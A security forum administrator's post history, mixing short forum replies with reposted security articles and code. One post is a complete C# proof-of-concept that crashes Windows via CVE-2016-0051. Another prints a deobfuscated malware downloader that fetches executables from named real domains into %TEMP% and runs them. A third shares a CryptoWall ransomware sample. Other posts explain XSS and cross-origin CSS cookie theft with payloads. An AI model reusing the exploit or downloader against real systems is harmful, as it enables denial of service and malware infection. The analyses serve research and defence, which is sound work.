Nytro
Administrators
  • Posts: 18725
  • Joined
  • Last visited
  • Days Won: 707

Everything posted by Nytro

  1. Create Your Own CMD.XLS

     For several years now I've been using my modified cmd.exe from Excel. I'm not releasing this spreadsheet with my cmd code, but I release the VBA code. You can create your own spreadsheet (or Word document) with this VBA file. If you don't know how, here's a video:

     Source: http://blog.didierstevens.com/2016/02/10/create-your-own-cmd-xls/
      • 1
      • Upvote
  2.

```csharp
/*
Source: https://github.com/koczkatamas/CVE-2016-0051

Proof-of-concept BSoD (Blue Screen of Death) code for CVE-2016-0051 (MS16-016).

Full Proof of Concept:
https://github.com/koczkatamas/CVE-2016-0051/archive/master.zip
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39432.zip
*/
using System;
using System.IO;
using System.Linq;
using System.Net;
using System.Net.Sockets;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;

namespace BSoD
{
    class Program
    {
        // Minimal WebDAV server on loopback: answers OPTIONS and PROPFIND so that the
        // Windows WebDAV client accepts \\127.0.0.1@<port>\folder\ as a share.
        static void StartFakeWebDavServer(int port)
        {
            new Thread(() =>
            {
                var server = new TcpListener(IPAddress.Loopback, port);
                server.Start();
                while (true)
                {
                    using (var client = server.AcceptTcpClient())
                    using (var stream = client.GetStream())
                    using (var reader = new StreamReader(stream, Encoding.GetEncoding("iso-8859-1")))
                    using (var writer = new StreamWriter(stream, Encoding.GetEncoding("iso-8859-1")) { AutoFlush = true })
                    {
                        Console.WriteLine(" =============== BEGIN REQUEST =============== ");
                        Func<string> rl = () =>
                        {
                            var line = reader.ReadLine();
                            Console.WriteLine("< " + line);
                            return line;
                        };
                        Action<string> wl = outData =>
                        {
                            Console.WriteLine(String.Join("\n", outData.Split('\n').Select(x => "> " + x)));
                            writer.Write(outData);
                        };

                        var header = rl().Split(' ');
                        while (!string.IsNullOrWhiteSpace(rl())) { }   // skip the request headers

                        if (header[0] == "OPTIONS")
                            wl("HTTP/1.1 200 OK\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nAllow: OPTIONS,GET,HEAD,PROPFIND\r\n\r\n");
                        else if (header[0] == "PROPFIND")
                        {
                            var body = String.Format(@"
<?xml version=""1.0"" encoding=""UTF-8""?>
<D:multistatus xmlns:D=""DAV:"">
  <D:response>
    <D:href>{0}</D:href>
    <D:propstat>
      <D:prop>
        <D:creationdate>{1:s}Z</D:creationdate>
        <D:getcontentlength>{3}</D:getcontentlength>
        <D:getcontenttype>{4}</D:getcontenttype>
        <D:getetag>{5}</D:getetag>
        <D:getlastmodified>{6:R}</D:getlastmodified>
        <D:resourcetype>{8}</D:resourcetype>
        <D:supportedlock></D:supportedlock>
        <D:ishidden>{7}</D:ishidden>
      </D:prop>
      <D:status>HTTP/1.1 200 OK</D:status>
    </D:propstat>
  </D:response>
</D:multistatus>",
                                header[1], DateTime.UtcNow.ToUniversalTime(), "", "0", "", "",
                                DateTime.UtcNow.ToUniversalTime(), 0,
                                header[1].Contains("file") ? "" : "<D:collection></D:collection>").Trim();
                            wl("HTTP/1.1 207 Multi-Status\r\nMS-Author-Via: DAV\r\nDAV: 1,2,1#extend\r\nContent-Length: " + body.Length + "\r\nContent-Type: text/xml\r\n\r\n" + body);
                        }
                        else
                            wl("HTTP/1.1 500 Internal Server Error\r\n\r\n");
                        Console.WriteLine(" =============== END REQUEST =============== ");
                    }
                }
            }) { IsBackground = true, Name = "WebDAV server thread" }.Start();
        }

        [StructLayout(LayoutKind.Sequential)]
        private class NETRESOURCE
        {
            public uint dwScope = 0;
            public uint dwType = 0;
            public uint dwDisplayType = 0;
            public uint dwUsage = 0;
            public string lpLocalName = null;
            public string lpRemoteName = null;
            public string lpComment = null;
            public string lpProvider = null;
        }

        [DllImport("mpr.dll")]
        private static extern int WNetAddConnection2(NETRESOURCE lpNetResource, string lpPassword, string lpUsername, int dwFlags);

        [DllImport("Advapi32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern int DuplicateEncryptionInfoFile(string srcFileName, string dstFileName, uint dwCreationDistribution, uint dwAttributes, IntPtr lpSecurityAttributes);

        public static void Main(string[] args)
        {
            var p = new Random().Next(1024, 65535);
            StartFakeWebDavServer(p);

            // Map the fake share through the Windows WebDAV client.
            var addConnectionResult = WNetAddConnection2(new NETRESOURCE() { lpRemoteName = @"\\127.0.0.1@" + p + @"\folder\" }, null, null, 0);
            Console.WriteLine("WNetAddConnection2 = " + addConnectionResult);

            // The EFS call against a file on the WebDAV path is what is expected to trigger the crash;
            // if it returns, the machine is not vulnerable (or the trigger did not fire).
            var duplicateEncryptionInfoResult = DuplicateEncryptionInfoFile(@"\\127.0.0.1@" + p + @"\folder\file", "x", 2, 128, IntPtr.Zero);
            Console.WriteLine("DuplicateEncryptionInfoFile = " + duplicateEncryptionInfoResult);

            Console.WriteLine("BSoD did not happen.");
            Console.ReadLine();
        }
    }
}
```

     Source: https://www.exploit-db.com/exploits/39432/
  3. See on the left. https://rstforums.com/forum/profile/19350-garryone/reputation/?type=forums_topic_post&change_section=1
  4. See on the left.
  5. Install a mail server on the server. That "smtp" some people are obsessed with without even knowing what it is.
  6. https://rstforums.com/forum/notifications/options/
  7. Exploiting a blind cross-site scripting vulnerability

     A cross-site scripting vulnerability (also known as XSS) is a vulnerability that allows hackers to execute malicious scripts in a web application. Looking at the statistics of Google's vulnerability reward program (Google rewards hackers for vulnerabilities they report to them), more than 65% of the vulnerabilities reported are XSS vulnerabilities.

     The basic principle of an XSS is that you insert a payload which then reflects back to you on the same page, for example on your profile page. A blind XSS goes further than that. A blind XSS doesn't reflect back to you, but it reflects back to systems like a CRM or a server administration panel. Since these systems are mostly designed to be used internally, they are not always developed with security in mind. This "no one can reach it anyway" approach can, for a hacker, be a ticket to the "holy grail".

     If an attacker wants to exploit a blind XSS he needs to do three things:

       1. Detect the vulnerability.
       2. Wait till someone opens the payload on an internal system.
       3. Exploit it.

     This requires a couple of tricks. First you need to write a script that calls back to you when your payload is executed. This can be accomplished fairly easily. For example the script given below will ping the "log server" with the given domain name and then execute the JavaScript passed back by that log server on the vulnerable web application. Doing this you can set up an interactive shell. This is example code; for this to work you also need a working back-end to interact with the script.

     By using JavaScript modules like for instance html2canvas it's incredibly easy to create screenshots of the victim's application, which could give a lot of insight into how the targeted application works and how you could exploit it further. Secondly, you likely want to view the HTML of the targeted page, and by using document.documentElement.innerHTML it's possible to get the content of the entire page.

     (Output shown: "192.168.1.10 is open.")

     As the XSS is likely executed on a device somewhere in a network, you could also use JavaScript to scan that infrastructure. You could run for example an IP range discovery or a port scan.

     So, testing your internal (web) applications for vulnerabilities is also very important, even if they are not "reachable" from the outside. Because, as you can see above, they may be reachable anyway. It just takes a little bit more effort.

     - Olivier Beg

     Source: http://blog.zerocopter.com/post/138552423798/exploiting-a-blind-cross-site-scripting
  8. NetworkMiner 2.0 Released

     I'm proud to announce the release of NetworkMiner 2.0 today! There are several longed-for features that are part of this major release, such as:

       • SMB/CIFS parser now supports file extraction from SMB write operations.
       • Added parser for SMB2 protocol (read and write).
       • Additional IEC-104 commands implemented.
       • Added Modbus/TCP parser (as requested by attendees at 4SICS 2014).
       • Improved SMTP parser.
       • Improved FTP parser.
       • Improved DNS parser.
       • GUI flickering is heavily reduced when loading PCAP files or doing live sniffing.
       • Extraction of web server favicon images (shown in Hosts tab).
       • Added "Keyword filter" to several tabs (see more details below).

     Image: NetworkMiner 2.0 showing hosts in nitroba.pcap from Digital Corpora

     For those not familiar with NetworkMiner, here's a short summary:

     Keyword Filtering

     Users of NetworkMiner sometimes run into a needle-in-the-haystack problem when trying to find some specific entry in the Files, Parameters or DNS tab. The technique most analysts have been using so far is to sort the data based on a column of interest (by clicking the column header) and then scroll down to the row they are looking for. This method isn't optimal, which is why several users have requested support for keyword filtering. I've personally received several of these requests when teaching my Network Forensics class. I'm therefore happy to say that version 2.0 of NetworkMiner has a built-in filtering capability for the data displayed in the following tabs:

       • Files
       • Parameters
       • DNS
       • Messages
       • Sessions

     Image: Parameters tab with filter "user-agent" (case insensitive)

     The filter allows rows to be filtered based on one or several keywords. The entered keywords are matched against all text in all columns of the tab. A drop-down menu in the filter bar allows the analyst to choose "Exact Phrase", "All Words" or "Any Word" as search criteria for the entered keywords.

     More Data in the Parameters Tab

     We have previously held back on what data we add to the Parameters tab. However, now with the filtering feature in place, we decided to add a lot more information to the Parameters list. Some of the new parameter types available in version 2.0 are:

       • HTTP request methods
       • HTTP URIs
       • HTTP response status codes
       • HTTP headers
       • SMB Tree Connect AndX Request (attempts to connect to a named file share)
       • SMB NT Create AndX Request (mapping of filename to file handle ID)
       • SMB2 Connect Requests (attempts to connect to a named file share)
       • SMB2 File ID (mapping of filename to file handle ID)
       • SMB2 file timestamps (Created, Modified and Accessed)

     Image: SMB2 file timestamps shown in Parameters tab

     A Warning to Malware Analysts

     NetworkMiner has previously appended the ".octet-stream" or "x-msdos-program" extension to all binary files being downloaded over HTTP (since those are the MIME types used for Windows executables). As of version 2.0, however, files named {something}.exe will not be renamed this way. This means that there is now a risk of accidental execution of such files, for example if the user right-clicks an .exe file in NetworkMiner and selects "Open File". If you analyze PCAP files that might contain malware, then our recommendation is to perform the analysis on some other operating system than Windows. NetworkMiner runs fine on Linux as well as Mac OS X.

     NetworkMiner Professional

     On top of the updates provided in the free version of NetworkMiner we have added a few additional useful features to NetworkMiner Professional. The new features in the Pro version include:

       • Advanced OS fingerprinting. Identifies a great range of operating systems and device types (including Apple iOS, Android and many others) based on DHCP traffic.
       • Web Browsing Analysis. A new GUI tab called "Browsers" has been added, which shows what URLs each unique browser has visited. More details on this feature will be released shortly in a separate blog post.
       • User Settings. Settings in the GUI can now be saved to make them persistent between executions.
       • Better Export Logs. The CSV format used for exporting data has been improved; we have also added support for XML formatted data export.

     Image: Android, Apple iOS, Mac OS and Windows detected in captured DHCP traffic from a WiFi network.

     Defang Executables

     Remember the warning about .exe files downloaded over HTTP no longer getting the ".octet-stream" extension? To counter the risk of accidental execution of malware we've added a defang feature to NetworkMiner Professional. When enabled, this feature will rename files like "malware.exe" to "malware.exe_" in order to prevent execution. It is not only .exe files being renamed. At the moment the following file extensions are defanged by appending "_" to the extension:

     The defang feature renames files regardless of whether they were transmitted over HTTP, FTP, TFTP, SMB, SMB2, SMTP or any other protocol supported by NetworkMiner. Please note that the defang feature is turned off by default. So if you wanna protect yourself from accidental execution, make sure to enable this feature in the NetworkMiner Settings (available under Tools > Settings).

     Credits

     There are many people who have provided feedback and ideas for improvements that are now part of NetworkMiner 2.0. I would especially like to thank Eric Kollmann (author of Satori) for his impressive ability to find bugs in beta releases. I would also like to thank Ulf Skoglund, Dmitry Shchemelev, @xredumb, Sabin and Andrew Brant for their feedback on improvements in DNS, TCP, HTTP and SMTP parsing. Finally, I wanna give a shout-out to Steffen Thorkildsen for spawning the idea for a browser tracking feature.

     Source: http://www.netresec.com/?page=Blog&month=2016-02&post=NetworkMiner-2-0-Released
  9. Cross-Origin CSS Attacks Revisited (feat. UTF-16)

     February 10, 2016 | Tags: Bug Bounty, CSS

     Prologue

     If you are a boring person like me and read specs in spare time, you may have come across this potential attack described by the CSP 2 spec:

     Lax Parsing

     Unlike JavaScript, which stops parsing when a syntax error is encountered, CSS parsing rules allow ignoring certain illegal parts in quirks mode.

     How This Was Abused

     Back in 2009, Chris Evans discovered that such behavior can lead to cross-domain theft. The way it worked is to find a page which reflects GET parameters, inject a crafted payload and import it in an attacker-controlled page. Since a picture is worth a thousand words, here is a picture which depicts the attack:

     In short, attackers inject two strings, a pre-string ({}#f{font-family:') and a post-string (';}), that surround the secret data. The junk is ignored while the payload then turns the secret data into a CSS property (font-family in this case), which can be revealed in the computed style. Note that the injected strings do not contain harmful characters (angle brackets) so they will generally not be escaped.

     Ultimately this attack can lead to data exfiltration. Since the cookie is sent along with the request, the stolen data can contain a CSRF token or personal information. There are however certain restrictions on this attack:

       • The extracted data needs to sit in between the pre-string and post-string. Having 2 injection points is not uncommon, yet not very usual.
       • The extracted data cannot contain both single and double quotes at the same time (because the data needs to be treated as a CSS string).
       • The extracted data cannot contain line breaks (CSS strings do not support multiple lines).

     These conditions are not easy to meet, especially the "no line breaks" requirement, as they are inevitable in modern coding style.

     How It Ended

     Internet Explorer and Firefox disabled the ability to import CSS with an incorrect MIME type (text/css) cross-origin. WebKit-based browsers on the other hand used strict parsing (stop parsing when an error is encountered) for cross-origin CSS for the sake of compatibility. The approach WebKit adopted is also suggested by CSP 2:

     Thinking Out Of The Box

     The suggested defense looks like a perfect balance: it resolves the issue while not breaking old websites which use an incorrect MIME type for CSS. Well, it surely does not break those websites, but it is not unbreakable either. It assumes that it is unlikely for attackers to influence a document in a way such that the content is valid CSS. What I am going to tell you is that we can indeed make a document syntactically valid with a little help from charset.

     Manipulating Charset

     The CSS spec defines the precedence of what charset should be used for a CSS:

       1. BOM
       2. Content-Type header (e.g. Content-Type: text/html; charset=utf-8)
       3. Environment encoding (the charset attribute of <link>)

     If a page does not specify a BOM or a charset on Content-Type, the encoding decision will fall back to the environment encoding, which we can control. The BOM is not an issue since it is discouraged according to the Unicode standard and nobody uses it. The Content-Type header is a bit tough because modern frameworks have it set by default, though it is not uncommon to see a page without charset specified on Content-Type due to various reasons. Facebook is an example which does not have charset set through Content-Type but instead relies on <meta charset>.

     Fiddling CSS Syntax

     Now to the most interesting part: forcing a document to be valid CSS. Before that, we need to understand the syntax. A CSS is a stylesheet. It has to start with @-rules or rulesets. Since it is nearly impossible for a document to start with @ or pull it out of thin air, we are only interested in rulesets. A rule is essentially selector + block. Selectors have different types but most of them contain an identifier. According to the spec, identifiers can contain only the characters [a-zA-Z0-9] and ISO 10646 characters U+00A0 and higher, plus the hyphen (-) and the underscore (_). Apparently, CSS allows a wide range (U+00A0 ~ U+10FFFF) of Unicode characters in valid identifiers, but penalizes ASCII characters: a single bracket or quote, which is common in an HTML document, is treated as invalid.

     How UTF-16 Comes Into Play

     Unlike most charsets, UTF-16 always maps 2 or more bytes into 1 character, even for ASCII. Now you start seeing the pattern: we can tell the parser that the document should be decoded as UTF-16, and all of a sudden the whole document becomes a valid identifier! This is because the transformation "eliminates" all ASCII characters, including line breaks and quotes (a NUL byte is needed as padding for an actual ASCII character in UTF-16). We then add a wildcard selector so that the following rule matches an element. So we now have the selector settled, and the parser continues to receive the block. At this point we just need to find an injection point and make a block to complete our payload. For the declaration, we need a property that accepts an arbitrary string value so that we can steal the secret data. font-family is the perfect choice as it supports not only strings but also identifiers. Let's see what we've got so far:

       Identifier(junk), * { font-family: Identifier(secret data)

     And that's it! ...Wait, where is the closing brace (})? Actually we can ignore it and it still remains valid. As per the spec, when the parser reaches EOF (End-of-File), the block will be closed automatically. Taking advantage of it, we only need one injection point to perform the attack.

     Nosniff?

     You may wonder: isn't X-Content-Type-Options exactly there to prevent such an attack? Unfortunately, for some reason WebKit does not honor this header when importing CSS. In other words, having X-Content-Type-Options: nosniff has no effect when the document is being treated as an external CSS.

     Limitation

     To sum up, the attack works when the following conditions are met:

       • The target does not have charset set in the Content-Type header
       • The injection point does not sanitize the NUL byte

     Compared with the original attack, the possibility to perform the attack is tremendously increased.

     PoC

     The following PoC will demonstrate how this attack can steal a victim's cookies from phpinfo. phpinfo is a common information leak which contains limited server information and HTTP request information. Normally it is immune from XSS; with this attack we can exfiltrate httpOnly cookies from the victim since it meets all the attack requirements (i.e. no charset on the header and accepts NUL bytes).

     PoC (Chrome 43, Safari 8 or iOS 8): http://innerht.ml/csstheft/phpinfo.html

     Although patched in modern browsers, I reckon there are still some homemade browsers which are vulnerable.

     Further Reading

       • There is also a similar attack for its counterpart JavaScript called XSSI
       • First-Party-Only Cookies is a proposed solution which prevents cookies being sent off in a third-party context
       • Entry Point Regulation is an alternative which restricts documents being used as external resources, although IMO the manifest is rather verbose

     References

       • Original Report to Chromium
       • CSS railway diagrams

     Source: http://blog.innerht.ml/cross-origin-css-attacks-revisited-feat-utf-16/
      • 1
      • Upvote
  10. FAST FULL-FEATURED SSL SCANNER

     Posted on 10/02/2016, 13:06 By Johnny Cash

     SSLyze is a Python tool that can analyze the SSL configuration of a server by connecting to it. It is designed to be fast and comprehensive, and should help organizations and testers identify misconfigurations affecting their SSL servers.

     Key features

       • Multi-processed and multi-threaded scanning: it's very fast.
       • Support for all SSL protocols, from SSL 2.0 to TLS 1.2.
       • SSLyze can also be used as a library, in order to run scans and process the results directly from Python.
       • Performance testing: session resumption and TLS tickets support.
       • Security testing: weak cipher suites, insecure renegotiation, CRIME, Heartbleed and more.
       • Server certificate validation and revocation checking through OCSP stapling.
       • Support for StartTLS handshakes on SMTP, XMPP, LDAP, POP, IMAP, RDP, PostGres and FTP.
       • Support for client certificates when scanning servers that perform mutual authentication.

     Installation

     SSLyze can be installed directly via pip:

       pip install sslyze

     or

       git clone https://github.com/nabla-c0d3/sslyze /opt/sslyze
       cd /opt/sslyze
       pip install -r requirements.txt --target ./lib

     Usage

       python sslyze_cli.py --regular www.yahoo.com:443 www.google.com

     Platforms

     SSLyze has been tested on the following platforms: Windows 7 (32 and 64 bits), Debian 7 (32 and 64 bits), OS X El Capitan.

     Source: http://securityblog.gr/3267/fast-full-featured-ssl-scanner/
      • 2
      • Upvote
  11. An Introduction to DOM XSS

     Published on February 10, 2016 By HollyGraceful on Web Application Security

     Document Object Model Based Cross-Site Scripting (DOM Based XSS) is a type of Cross-site Scripting where, instead of the payload being stored or reflected by the remote web server and appearing in the response HTML, the payload is instead stored in the DOM and processed insecurely by JavaScript. For those unfamiliar with what the DOM is, a short and fairly untechnical overview is available here.

     The impact and exploitation of DOM-XSS is essentially the same as reflected or stored, however the detection is a little different, as you can't simply check the server responses and build up a payload. For example if you're using Burp Suite for testing, Burp doesn't parse or execute JavaScript and therefore it won't be too much help there. (It will however look for DOM-XSS through static analysis and pick up on issues such as location.hash ending up in document.write).

     This is the idea of "sinks" and "sources", where a vulnerability may occur if an attacker is able to control a source and the data retrieved makes it into a sink without filtering, validation or encoding. The data may be processed and changed in the centre as long as a payload can be snuck along too. Essentially we concentrate on areas where user input may find its way into potentially vulnerable functions. It may be useful to remember that Firefox can show the DOM source by highlighting an area of the page and selecting "View Selection Source". Generally I will manually review JavaScript and try and link between areas of user input and potentially dangerous functions.

     Here I'll try to demonstrate the concept through a real-world example found on a recent Penetration Test. Hopefully this will highlight the concepts as well as some of the difficulties in finding these issues:

     During a recent Penetration Test I came across an interesting piece of JavaScript which turned out to be vulnerable, so I've cleaned it up, anonymised it and present it here as a vulnerable example. In the actual application this was a collection of four functions being loaded from different locations and was a little more complex than what you see here; I've simply reduced the complexity so that it doesn't distract too much from the general idea. The idea here was that I tied a source to a sink and that led to an exploit. The following code is similar to what I found during my Penetration Test:

```html
1.  <html><body>
2.  <script>
3.  function OnLoad() {
4.      var foundFrag = get_fragment();
5.      return foundFrag;
6.  }
7.
8.  function get_fragment() {
9.      var r4c='(.*?)';
10.     var results = location.hash.match('.*input=token('+r4c+');');
11.
12.     if(results){
13.         return (unescape (results[2]));
14.     } else {
15.         return null;
16.     }
17. }
18.
19. display_session = OnLoad();
20. document.write("Your session ID was: "+display_session+"<br><br>")</script>
21. An error occurred...
22. </body></html>
```

     First of all I noticed the function document.write() executing with a parameter containing get_fragment(). I traced document.write through display_session to OnLoad(), which executes get_fragment(), which takes input from the URL. In reality that link between user input and vulnerable function was a little more blurry, with some additional processing being done to "results", however you can see the idea here. Through the application scripts we try and tie together user inputs and vulnerable functions. If we can get unfiltered user input into document.write() we can deface the web application or potentially steal confidential data.

     location.hash is being used as input to that function so let's start there, because that's user input (an attacker could craft a malicious link with a payload in the fragment). For those unfamiliar with JavaScript, the line in question is number 10. It's taking location.hash, which is the contents of the URL after the "fragment", that's after the # at the end of the URL, such as:

       http://gracefulsecurity.com/example?#foobar

     It's taking the word "foobar" from above and applying a Regular Expression to it. The expression looks for the string "input=token" anywhere in the fragment and reads from that string up to a semi-colon character (that's what r4c is doing; it's a capture group that captures any character using the multiple wildcard ".*"). Therefore in this case, if I wanted to execute a simple XSS proof-of-concept such as alert(1) I could place this in the URL fragment after the string input=token but before a semicolon, like this:

       http://gracefulsecurity.com/example?#input=token<script>alert(1)</script>;

     With this, the script would find input=token and read from there up to the semi-colon, then place that input within the document.write function and the following happens:

     A simple XSS proof-of-concept. Here however you might think that a more complex payload would not be possible, as the application stops reading when it spots a semi-colon and so something as simple as alert(1);alert(2) would not be possible; however thanks to the use of unescape() on the returned data I can use a payload like this:

       http://gracefulsecurity.com/example?#input=token<script>alert(1)%3balert(2)</script>;

     Where I am replacing the ; character with its URI encoded equivalent! Now I can write my malicious JavaScript payload and craft a link to send to a victim just like I would with standard reflected cross-site scripting! So all in all detection and payload generation is usually a little trickier, but the act of exploitation and the impact is just the same!

     Detection is harder because I can't use a tool like Burp Suite to view the modified responses (as it's all handled client side by the browser). However by using tools like Firebug, by using the developer console, or by statically analysing the JavaScript we can still pick up on these issues simply.

     Remediation

     It's worth noting that modern browsers have made steps to restrict the exploitability of issues like reflected XSS and DOM-Based XSS. However there are still things that can be done by developers. Generally speaking, HTML entity encoding non-alphanumeric user input as it is rendered to the browser will effectively block an attacker's ability to execute scripts in the malicious ways described above whilst preserving the functionality of the application. It's not enough to block keywords such as "script" (and certainly alert!); it is more important to block the characters required to write effective JavaScript, such as: ( ) ; " '

     I build on this idea in more detail within my article about Web Application Defence, which can be found here.

     Source: https://www.gracefulsecurity.com/an-introduction-to-dom-xss/
      • 2
      • Upvote
  12. I found this on Twitter: For those who don't know: this is MALWARE (in fact RANSOMWARE, or a "virus"). If you don't know what it is, it's not for you. It's for those who want to analyze it. The file is attached. The archive password is "RST". CryptoWall.zip
  13. As an idea, it can be deobfuscated very easily. At the end you can see: "this[h91](n49);". It's a function call with a certain parameter. What happens if we print that parameter (n49)? That is, we replace "this[h91]" with "document.write" and:

```javascript
var b = "yatrazone.com exquisitecorpse.co.nz.s74023.gridserver.com maineselectrealestate.com".split(" ");
var ws = WScript.CreateObject("WScript.Shell");
var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + "302988";
var xo = WScript.CreateObject("MSXML2.XMLHTTP");
var xa = WScript.CreateObject("ADODB.Stream");
var ld = 0;
for (var n = 1; n <= 3; n++) {
    for (var i = ld; i < b.length; i++) {   // loop bound reconstructed: the text between "<" and ">" was lost in extraction
        var dn = 0;                          // not in the surviving text; needed for the check after the download
        try {
            /* [lost in extraction: the xo.open("GET", "http://" + b[i] + ..., false) request,
               xo.send(), a response check and the copy of the response body into xa] */
            if (xo.status == 200) {          // reconstructed: this is the block that the "};" after xa.close() closes
                if (xa.size > 1000) {        // only "> 1000" survived; xa.size is assumed as the left-hand side
                    dn = 1;
                    xa.position = 0;
                    xa.saveToFile(fn + n + ".exe", 2);
                    try {
                        ws.Run(fn + n + ".exe", 1, 0);
                    } catch (er) { }
                }
                xa.close();
            }
            if (dn == 1) {
                ld = i;
                break;
            }
        } catch (er) { }
    }
}
```

     PS: I think this junk (with WScript.Shell) only works on IE6, at most IE7.
  14. Nytro

    Fun stuff

    https://www.gofundme.com/w8nvtk7d
  15. Get an AllView.
  16. We'll put several suggestions like this to a vote. That way you'll get the impression that it's a democracy
  17. Nytro

    Like vs Rep

    IPBoard makes you choose: Reputation or Like. I think it's actually the same thing.
  18. I don't think you're doing things so nasty that you need to go through a lot of anonymization layers. A VPS/VPN with Tor should be enough, I think.
  19. VPN -> Tor -> VPS -> Tor -> VPN, repeated 2-3 times! All while wearing a mask in a McDonald's and changing your MAC address! Then flee to another city! I don't think I need to say that you'll have to get a new ID card and some plastic surgery afterwards...
  20. Damn, you figured it out... In case you can't tell by yourselves which one I am in that picture: I know, I've put on a bit of a belly, stop picking on me
  21. I can't do anything about the old links, they have a different ID... There's nothing I can do. I'll see if I can find a link between them...
  22. We'll take it into consideration; for now it stays as it is.
  23. Does it do that to you all the time, or only now and then? It might be because of their chat service. In case you didn't know, the chat conversations go through them. I'll see what I can do about it. But it's possible that it doesn't work because of that.
  24. Nytro

    Test

    Can images be posted in the chat? I didn't know.
  25. I did. Seriously, I put it on RST. It turned out to be crap. There were a ton of problems, nothing worked, pages took 20 seconds to load... It was a mess.